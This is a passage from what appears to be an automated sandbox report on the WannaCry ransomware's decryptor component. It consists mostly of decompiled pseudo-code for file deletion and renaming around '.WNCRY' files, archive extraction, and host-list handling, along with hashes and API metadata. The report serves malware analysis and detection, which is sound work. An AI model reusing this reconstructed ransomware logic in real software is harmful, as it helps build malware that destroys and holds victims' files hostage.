                                                      							goto L4;
                                                      						} else {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                                      					DeleteFileW( &_v720);
                                                      					goto L11;
                                                      				} else {
                                                      					if(DeleteFileW(_t23) == 0) {
                                                      						L11:
                                                      						return 0;
                                                      					} else {
                                                      						if(_t30 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							return MoveFileW( &_v720, _t23);
                                                      						}
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v0;
                                                      				char _v260;
                                                      				struct _FILETIME _v268;
                                                      				struct _FILETIME _v276;
                                                      				struct _FILETIME _v284;
                                                      				void* _v292;
                                                      				void* _v296;
                                                      				signed int _v304;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v820;
                                                      				void* _v824;
                                                      				void* _v827;
                                                      				void* _v828;
                                                      				long _v829;
                                                      				void* _v836;
                                                      				intOrPtr _t68;
                                                      				long _t77;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				long _t94;
                                                      				signed int _t97;
                                                      				long _t99;
                                                      				void* _t106;
                                                      				int _t116;
                                                      				long _t121;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				unsigned int _t140;
                                                      				signed int _t141;
                                                      				void* _t154;
                                                      				intOrPtr* _t157;
                                                      				intOrPtr _t166;
                                                      				void* _t174;
                                                      				signed int _t175;
                                                      				signed int _t176;
                                                      				long _t177;
                                                      				signed int _t178;
                                                      				signed int _t179;
                                                      				intOrPtr* _t180;
                                                      				void* _t182;
                                                      				long _t183;
                                                      				intOrPtr* _t185;
                                                      				void* _t187;
                                                      				void* _t191;
                                                      				void* _t192;
                                                      
                                                      				_t166 = _a16;
                                                      				_t132 = __ecx;
                                                      				if(_t166 == 3) {
                                                      					_t68 =  *((intOrPtr*)(__ecx + 4));
                                                      					_t176 = _a4;
                                                      					__eflags = _t176 - _t68;
                                                      					if(_t176 == _t68) {
                                                      						L14:
                                                      						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                                      						__eflags = _t177;
                                                      						if(_t177 <= 0) {
                                                      							E00411AC0( *_t132);
                                                      							 *(_t132 + 4) = 0xffffffff;
                                                      						}
                                                      						__eflags = _v829;
                                                      						if(_v829 == 0) {
                                                      							__eflags = _t177;
                                                      							if(_t177 <= 0) {
                                                      								asm("sbb eax, eax");
                                                      								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                                      								__eflags = _t77;
                                                      								return _t77;
                                                      							} else {
                                                      								return 0x600;
                                                      							}
                                                      						} else {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						__eflags = _t68 - 0xffffffff;
                                                      						if(_t68 != 0xffffffff) {
                                                      							E00411AC0( *((intOrPtr*)(__ecx)));
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t81 =  *_t132;
                                                      						 *(_t132 + 4) = 0xffffffff;
                                                      						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                                      						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                                      							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                                      							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                                      								E00411390(_t81);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t82 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                                      								E004113E0(_t82);
                                                      								_t82 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							}
                                                      							_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      							_push( *_t132);
                                                      							E00411660();
                                                      							_t187 = _t187 + 8;
                                                      							 *(_t132 + 4) = _t176;
                                                      							goto L14;
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					if(_t166 == 2 || _t166 == 1) {
                                                      						_t178 = _t175 | 0xffffffff;
                                                      						__eflags =  *(_t132 + 4) - _t178;
                                                      						if( *(_t132 + 4) != _t178) {
                                                      							E00411AC0( *_t132);
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t90 =  *_t132;
                                                      						 *(_t132 + 4) = _t178;
                                                      						_t179 = _a4;
                                                      						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                                      						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                                      							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                                      							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                                      								E00411390(_t90);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t91 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                                      								E004113E0(_t91);
                                                      								_t91 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							}
                                                      							_t138 = _t132;
                                                      							E00411CF0(_t138, _t179,  &_v560);
                                                      							__eflags = _v304 & 0x00000010;
                                                      							if((_v304 & 0x00000010) == 0) {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t157 = _a8;
                                                      									_t185 = _t157;
                                                      									_t180 = _t157;
                                                      									_t94 =  *_t157;
                                                      									__eflags = _t94;
                                                      									while(_t94 != 0) {
                                                      										__eflags = _t94 - 0x2f;
                                                      										if(_t94 == 0x2f) {
                                                      											L43:
                                                      											_t185 = _t180 + 1;
                                                      										} else {
                                                      											__eflags = _t94 - 0x5c;
                                                      											if(_t94 == 0x5c) {
                                                      												goto L43;
                                                      											}
                                                      										}
                                                      										_t94 =  *((intOrPtr*)(_t180 + 1));
                                                      										_t180 = _t180 + 1;
                                                      										__eflags = _t94;
                                                      									}
                                                      									asm("repne scasb");
                                                      									_t140 =  !(_t138 | 0xffffffff);
                                                      									_v828 =  &_v820;
                                                      									_t182 = _t157 - _t140;
                                                      									_t141 = _t140 >> 2;
                                                      									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                                      									__eflags = _t185 - _t157;
                                                      									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                                      									_t191 = _t187 + 0x18;
                                                      									if(__eflags != 0) {
                                                      										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                                      										_t99 = _v820;
                                                      										__eflags = _t99 - 0x2f;
                                                      										if(_t99 == 0x2f) {
                                                      											L55:
                                                      											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                                      											E00412250(0, _t191 + 0x2c);
                                                      											_t187 = _t191 + 0x18;
                                                      											goto L48;
                                                      										} else {
                                                      											__eflags = _t99 - 0x5c;
                                                      											if(_t99 == 0x5c) {
                                                      												goto L55;
                                                      											} else {
                                                      												__eflags = _t99;
                                                      												if(_t99 == 0) {
                                                      													goto L47;
                                                      												} else {
                                                      													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                                      													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                                      														goto L47;
                                                      													} else {
                                                      														goto L55;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L73;
                                                      									} else {
                                                      										_v820 = 0;
                                                      										L47:
                                                      										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                                      										E00412250(_t132 + 0x140, _t191 + 0x30);
                                                      										_t187 = _t191 + 0x1c;
                                                      									}
                                                      									L48:
                                                      									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
                                                      								} else {
                                                      									_t174 = _a8;
                                                      								}
                                                      								__eflags = _t174 - 0xffffffff;
                                                      								if(_t174 != 0xffffffff) {
                                                      									_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      									_push( *_t132);
                                                      									E00411660();
                                                      									_t106 =  *(_t132 + 0x13c);
                                                      									_t192 = _t187 + 8;
                                                      									__eflags = _t106;
                                                      									if(_t106 == 0) {
                                                      										_push(0x4000);
                                                      										L00412CEC();
                                                      										_t192 = _t192 + 4;
                                                      										 *(_t132 + 0x13c) = _t106;
                                                      									}
                                                      									_v820 = 0;
                                                      									while(1) {
                                                      										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                                      										_t192 = _t192 + 0x10;
                                                      										__eflags = _t183 - 0xffffff96;
                                                      										if(_t183 == 0xffffff96) {
                                                      											break;
                                                      										}
                                                      										__eflags = _t183;
                                                      										if(__eflags < 0) {
                                                      											L68:
                                                      											_v820 = 0x5000000;
                                                      										} else {
                                                      											if(__eflags <= 0) {
                                                      												L63:
                                                      												__eflags =  *(_t192 + 0x13);
                                                      												if( *(_t192 + 0x13) != 0) {
                                                      													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
                                                      												} else {
                                                      													__eflags = _t183;
                                                      													if(_t183 == 0) {
                                                      														goto L68;
                                                      													} else {
                                                      														continue;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
                                                      												__eflags = _t116;
                                                      												if(_t116 == 0) {
                                                      													_v820 = 0x400;
                                                      												} else {
                                                      													goto L63;
                                                      												}
                                                      											}
                                                      										}
                                                      										L70:
                                                      										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                                      										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                                      											CloseHandle(_t174);
                                                      										}
                                                      										E00411AC0( *_t132);
                                                      										return _v820;
                                                      										goto L73;
                                                      									}
                                                      									_v820 = 0x1000;
                                                      									goto L70;
                                                      								} else {
                                                      									return 0x200;
                                                      								}
                                                      							} else {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t154 = _a8;
                                                      									_t121 =  *_t154;
                                                      									__eflags = _t121 - 0x2f;
                                                      									if(_t121 == 0x2f) {
                                                      										L36:
                                                      										E00412250(0, _t154);
                                                      										__eflags = 0;
                                                      										return 0;
                                                      									} else {
                                                      										__eflags = _t121 - 0x5c;
                                                      										if(_t121 == 0x5c) {
                                                      											goto L36;
                                                      										} else {
                                                      											__eflags = _t121;
                                                      											if(_t121 == 0) {
                                                      												L37:
                                                      												E00412250(_t132 + 0x140, _t154);
                                                      												__eflags = 0;
                                                      												return 0;
                                                      											} else {
                                                      												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                                      												if( *((char*)(_t154 + 1)) != 0x3a) {
                                                      													goto L37;
                                                      												} else {
                                                      													goto L36;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eflags = 0;
                                                      									return 0;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					} else {
                                                      						return 0x10000;
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}



















































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 5870813841fd6422a36b130af846364780db05c619c896662a0e99f340824b5b
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                      				CHAR* _v8;
                                                      				intOrPtr* _v24;
                                                      				intOrPtr _v28;
                                                      				struct _STARTUPINFOA _v96;
                                                      				int _v100;
                                                      				char** _v104;
                                                      				int _v108;
                                                      				void _v112;
                                                      				char** _v116;
                                                      				intOrPtr* _v120;
                                                      				intOrPtr _v124;
                                                      				void* _t27;
                                                      				intOrPtr _t36;
                                                      				signed int _t38;
                                                      				int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t49;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr _t58;
                                                      				intOrPtr _t61;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x41baa8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_v28 = _t58 - 0x68;
                                                      				_v8 = 0;
                                                      				__set_app_type(2);
                                                      				 *0x422298 =  *0x422298 | 0xffffffff;
                                                      				 *0x42229c =  *0x42229c | 0xffffffff;
                                                      				 *(__p__fmode()) =  *0x42228c;
                                                      				 *(__p__commode()) =  *0x422288;
                                                      				 *0x422294 = _adjust_fdiv;
                                                      				_t27 = E004133C7( *_adjust_fdiv);
                                                      				_t61 =  *0x421790; // 0x1
                                                      				if(_t61 == 0) {
                                                      					__setusermatherr(E004133C4);
                                                      				}
                                                      				E004133B2(_t27);
                                                      				_push(0x41f018);
                                                      				_push(0x41f014);
                                                      				L004133AC();
                                                      				_v112 =  *0x422284;
                                                      				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                                      				_push(0x41f010);
                                                      				_push(0x41f000);
                                                      				L004133AC();
                                                      				_t55 =  *_acmdln;
                                                      				_v120 = _t55;
                                                      				if( *_t55 != 0x22) {
                                                      					while( *_t55 > 0x20) {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				} else {
                                                      					do {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      						_t42 =  *_t55;
                                                      					} while (_t42 != 0 && _t42 != 0x22);
                                                      					if( *_t55 == 0x22) {
                                                      						L6:
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				}
                                                      				_t36 =  *_t55;
                                                      				if(_t36 != 0 && _t36 <= 0x20) {
                                                      					goto L6;
                                                      				}
                                                      				_v96.dwFlags = 0;
                                                      				GetStartupInfoA( &_v96);
                                                      				if((_v96.dwFlags & 0x00000001) == 0) {
                                                      					_t38 = 0xa;
                                                      				} else {
                                                      					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                      				}
                                                      				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                      				_v108 = _t40;
                                                      				exit(_t40);
                                                      				_t41 = _v24;
                                                      				_t49 =  *((intOrPtr*)( *_t41));
                                                      				_v124 = _t49;
                                                      				_push(_t41);
                                                      				_push(_t49);
                                                      				L004133A6();
                                                      				return _t41;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
                                                      				void* _t9;
                                                      				struct HWND__* _t10;
                                                      				long _t12;
                                                      				long* _t22;
                                                      				void* _t24;
                                                      
                                                      				_t24 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      					E00404530(__ecx);
                                                      				}
                                                      				_t9 = E004045E0(_t24,  &_a8);
                                                      				if(_t9 == 0) {
                                                      					L6:
                                                      					L00412CBC();
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = _t24 + 0x44;
                                                      					_push(0);
                                                      					_push("mailto:");
                                                      					L00412DB2();
                                                      					if(_t9 != 0) {
                                                      						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                                      						goto L6;
                                                      					} else {
                                                      						_t10 = GetParent( *(_t24 + 0x20));
                                                      						_push(_t10);
                                                      						L00412DAC();
                                                      						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                                      						L00412CBC();
                                                      						return _t12;
                                                      					}
                                                      				}
                                                      			}









                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E0040BAF0() {
                                                      				signed int _t71;
                                                      				signed int _t72;
                                                      				void* _t84;
                                                      				signed int _t86;
                                                      				signed int _t91;
                                                      				signed int _t92;
                                                      				signed int _t97;
                                                      				intOrPtr _t101;
                                                      				signed int _t110;
                                                      				void* _t113;
                                                      				void* _t116;
                                                      				signed int _t126;
                                                      				char _t129;
                                                      				signed int _t131;
                                                      				unsigned int _t138;
                                                      				signed int _t139;
                                                      				char* _t144;
                                                      				signed int _t147;
                                                      				unsigned int _t152;
                                                      				signed int _t153;
                                                      				signed int _t158;
                                                      				signed int _t160;
                                                      				signed int _t161;
                                                      				signed int _t172;
                                                      				signed int _t173;
                                                      				signed int _t181;
                                                      				signed int _t191;
                                                      				signed int _t198;
                                                      				signed int _t199;
                                                      				signed int _t200;
                                                      				void* _t237;
                                                      				char* _t238;
                                                      				void* _t240;
                                                      				void* _t241;
                                                      				intOrPtr* _t242;
                                                      				void* _t245;
                                                      				intOrPtr* _t246;
                                                      				signed int _t249;
                                                      				intOrPtr* _t250;
                                                      				intOrPtr _t251;
                                                      				void* _t252;
                                                      				void* _t255;
                                                      				void* _t256;
                                                      				void* _t257;
                                                      				void* _t259;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      				void* _t263;
                                                      				void* _t264;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00414286);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t251;
                                                      				_t252 = _t251 - 0x47c;
                                                      				_t71 = E0040BA10();
                                                      				if(_t71 != 0) {
                                                      					L31:
                                                      					_t72 = _t71 | 0xffffffff;
                                                      					__eflags = _t72;
                                                      				} else {
                                                      					_t131 =  *0x422210;
                                                      					 *((intOrPtr*)( *_t131 + 0xc))();
                                                      					asm("repne scasb");
                                                      					_t266 =  !(_t131 | 0xffffffff) == 1;
                                                      					if( !(_t131 | 0xffffffff) == 1) {
                                                      						L3:
                                                      						_t249 = 0;
                                                      						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                                      						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                                      						 *(_t252 + 0x1c) = 0;
                                                      						asm("repne scasb");
                                                      						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                                      						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                                      						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                                      						_t139 = _t138 >> 2;
                                                      						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                                      						_t255 = _t252 + 0x18;
                                                      						_t144 = _t255 + 0xa8;
                                                      						_t238 = strtok(_t144, ",;");
                                                      						_t256 = _t255 + 8;
                                                      						if(_t238 != 0) {
                                                      							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                                      							do {
                                                      								_t200 = _t249;
                                                      								_t249 = _t249 + 1;
                                                      								if(_t200 > 0) {
                                                      									_t181 = _t256 + 0x28;
                                                      									 *(_t256 + 0x28) = _t129;
                                                      									E0040C7B0(_t181, 0);
                                                      									asm("repne scasb");
                                                      									_push( !(_t181 | 0xffffffff) - 1);
                                                      									_push(_t238);
                                                      									E0040C920(_t256 + 0x2c);
                                                      									 *((char*)(_t256 + 0x4a0)) = 1;
                                                      									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                                      									_t144 = _t256 + 0x28;
                                                      									 *((char*)(_t256 + 0x498)) = 0;
                                                      									E0040C7B0(_t144, 1);
                                                      								}
                                                      								_t238 = strtok(0, ",;");
                                                      								_t256 = _t256 + 8;
                                                      							} while (_t238 != 0);
                                                      						}
                                                      						asm("repne scasb");
                                                      						_t147 =  !(_t144 | 0xffffffff) - 1;
                                                      						if(_t147 == 0) {
                                                      							L17:
                                                      							_push(_t256 + 0xa4);
                                                      							_t84 = E0040BA60(_t277);
                                                      							_t256 = _t256 + 4;
                                                      							if(_t84 != 0) {
                                                      								goto L19;
                                                      							} else {
                                                      								asm("repne scasb");
                                                      								_t172 =  !(_t147 | 0xffffffff);
                                                      								_t245 = _t256 + 0xa4 - _t172;
                                                      								_t173 = _t172 >> 2;
                                                      								memcpy(0x422214, _t245, _t173 << 2);
                                                      								_t263 = _t256 + 0xc;
                                                      								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                                      								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                                      								_t264 = _t263 + 0xc;
                                                      								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                                      								_push( *((intOrPtr*)(_t264 + 0x18)));
                                                      								L00412C98();
                                                      								_t252 = _t264 + 4;
                                                      								_t72 = 0;
                                                      							}
                                                      						} else {
                                                      							_t246 = _t256 + 0xa4;
                                                      							_t116 = 0x422214;
                                                      							while(1) {
                                                      								_t198 =  *_t116;
                                                      								_t147 = _t198;
                                                      								if(_t198 !=  *_t246) {
                                                      									break;
                                                      								}
                                                      								if(_t147 == 0) {
                                                      									L14:
                                                      									_t116 = 0;
                                                      								} else {
                                                      									_t199 =  *((intOrPtr*)(_t116 + 1));
                                                      									_t147 = _t199;
                                                      									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                                      										break;
                                                      									} else {
                                                      										_t116 = _t116 + 2;
                                                      										_t246 = _t246 + 2;
                                                      										if(_t147 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								}
                                                      								L16:
                                                      								_t277 = _t116;
                                                      								if(_t116 == 0) {
                                                      									L19:
                                                      									srand(GetTickCount());
                                                      									_t86 =  *(_t256 + 0x20);
                                                      									_t257 = _t256 + 4;
                                                      									__eflags = _t86;
                                                      									if(_t86 <= 0) {
                                                      										L30:
                                                      										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                                      										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                                      										_push( *((intOrPtr*)(_t257 + 0x18)));
                                                      										L00412C98();
                                                      										_t252 = _t257 + 4;
                                                      										goto L31;
                                                      									} else {
                                                      										do {
                                                      											_t191 = rand() % _t86;
                                                      											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                                      											__eflags = _t191;
                                                      											_t91 = _t191;
                                                      											if(_t191 > 0) {
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												do {
                                                      													_t250 =  *_t250;
                                                      													_t191 = _t191 - 1;
                                                      													__eflags = _t191;
                                                      												} while (_t191 != 0);
                                                      											}
                                                      											__eflags = _t91;
                                                      											if(_t91 < 0) {
                                                      												_t110 =  ~_t91;
                                                      												do {
                                                      													_t250 =  *((intOrPtr*)(_t250 + 4));
                                                      													_t110 = _t110 - 1;
                                                      													__eflags = _t110;
                                                      												} while (_t110 != 0);
